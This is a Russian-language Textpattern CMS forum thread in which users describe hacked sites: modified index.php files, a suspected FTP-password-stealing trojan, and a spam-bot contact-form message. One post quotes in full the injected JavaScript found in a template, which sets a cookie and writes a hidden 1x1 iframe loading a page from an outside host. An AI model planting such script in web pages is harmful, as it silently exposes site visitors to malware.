Textpattern - на русском языке

форум общения русскоязычных пользователей CMS Текстпаттерн

Вы не зашли.

#1 04-05-2010 20:45:57

advan
ю
Откуда: Mk
Зарегистрирован: 05-11-2006
Сообщений: 835
Вебсайт

Безопасность TXP

Сегодня случайно зашел в диагностику и увидел, что "Некоторые файлы Textpattern были изменены:", а именно файл index.php в корне.
Поглядел в него, а там длиннющая строка со скриптом после основного кода. Файл заменил на оригинальный, сменил пароль на фтп, комп проверил...

К чему все это пишу - полезно было бы (на мой взгляд) результаты предварительной проверки, что в диагностике, выводить где-нибудь в более часто посещаемой и более видимой части админки.


Знакомьтесь на здоровье - http://love.kachok.ru  /  Я в PHP ниПХПуя незнаю! :)

Неактивен

 

#2 04-05-2010 21:32:08

the_ghost
ять
Откуда: Минск
Зарегистрирован: 01-05-2007
Сообщений: 1957
Вебсайт

Re: Безопасность TXP

У меня тоже недавно был такой глюк - видимо троянчег крадет пароли от фтп и прописывается во всех index файлах. Советую проверить все файлы по маске index*.* на всех своих хостингах.
А может и *.html туда же.


.      Создание шаблонов для Textpatern http://textpattern.ru/forum/viewtopic.php?id=1665 (<txp:make_template quality="best" />)
КОНСУЛЬТАЦИИ по Textpattern - ICQ#8458496, nemiga@gmail.com <txp:if_question><txp:pay /></txp:if_question>
       Список всех тегов - http://textbook.textpattern.net/wiki/in … _Reference

Неактивен

 

#3 18-01-2011 13:40:50

advan
ю
Откуда: Mk
Зарегистрирован: 05-11-2006
Сообщений: 835
Вебсайт

Re: Безопасность TXP

Сегодня перестал загружаться один из сайтов - в шаблоне страницы (TXP) обнаружил такой код:

Код:

<script>function addCookie(szName,szValue,dtDaysExpires){var dtExpires = new Date();var dtExpiryDate = \"\";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+\"=\"+szValue+\";expires=\"+dtExpiryDate;}function findCookie(szName){var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie;while(i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if(szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(\";\",nStartPosition);if(nEndPosition<nStartPosition)nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;}return \"\";}var szCookieString = document.cookie;if(findCookie(\"ffsesidd\")==\"c48a765e4f75baeb85f0a755fc3ec09c\"){}else{addCookie(\"ffsesidd\",\"c48a765e4f75baeb85f0a755fc3ec09c\",1);document.write(\'<iframe src=\"http://vsv1.co.cc/imgurl.php?hl=d5c7173509a2c384\" name=\"facebook\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>\');}</script>

Каким образом эта гадость попала на сайт и как себя можно обезопасить в будущем?

PS - по поводу своего первого поста нашел плагин smd_prognostics, но я его так и не смог завести sad


Знакомьтесь на здоровье - http://love.kachok.ru  /  Я в PHP ниПХПуя незнаю! :)

Неактивен

 

#4 18-01-2011 14:01:32

the_ghost
ять
Откуда: Минск
Зарегистрирован: 01-05-2007
Сообщений: 1957
Вебсайт

Re: Безопасность TXP

Случайно разбился хрустальный шар - никто не сможет точно сказать удаленно каким образом с вами это случилось. Советую а) обновиться до 4.3.0, б) проверить логи TXP, в) проверить логи хостера


.      Создание шаблонов для Textpatern http://textpattern.ru/forum/viewtopic.php?id=1665 (<txp:make_template quality="best" />)
КОНСУЛЬТАЦИИ по Textpattern - ICQ#8458496, nemiga@gmail.com <txp:if_question><txp:pay /></txp:if_question>
       Список всех тегов - http://textbook.textpattern.net/wiki/in … _Reference

Неактивен

 

#5 18-01-2011 15:21:36

advan
ю
Откуда: Mk
Зарегистрирован: 05-11-2006
Сообщений: 835
Вебсайт

Re: Безопасность TXP

430 - уже давно обновлен. Логи гляну на досуге.. только вот что там конкретно искать-то? smile

Подозреваю, что изменения были через аминку txp / sql, т.е. не через фтп.


Знакомьтесь на здоровье - http://love.kachok.ru  /  Я в PHP ниПХПуя незнаю! :)

Неактивен

 

#6 10-02-2011 13:56:43

Richard
есть
Откуда: Киев
Зарегистрирован: 15-05-2008
Сообщений: 63
Вебсайт

Re: Безопасность TXP

Через форму обратной связи zem contact получил сообщение. Чтобы это значило: кто-то развлекается или пытается найти, как залезть на сайт?

Ваше имя:: hoyavjqh

Ваш e-mail:: awkznf@pcrage.com

Заголовок сообщения:: MaxhhfOobgyW

Ваше сообщение:: rgHNdN  <a hr ef="h ttp://ahzmsldhnoks.com/">ahzmsldhnoks</a>, [url=http://g wtzixasgaxi.com/]gwtzixasgaxi[/u rl], [ lin k=http://djrqivleltfy.com/]djrqivleltfy[/ lin k], h ttp://ezfzsxfqjrtf.com/

IP: 193.137.203.231

Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10


П.С В добавил пробелы, чтобы абракадабра не отображалась ссылками.

Отредактированно Richard (10-02-2011 14:00:09)

Неактивен

 

#7 10-02-2011 15:24:56

makss
наш
Зарегистрирован: 21-10-2008
Сообщений: 208
Вебсайт

Re: Безопасность TXP

скорее всего это хрумка(или что-то похожее) на полном автомате ищет места для спама...


aks_rss : RSS parser and aggregator | http://makss.uaho.net/plugins/aks_rss
aks_table : Simple tables in TxP (Ctrl+C, Ctrl+V) | http://makss.uaho.net/plugins/aks_table

Неактивен

 

Board footer

RSS   Rambler's Top100
Powered by PunBB
Textpattern.ru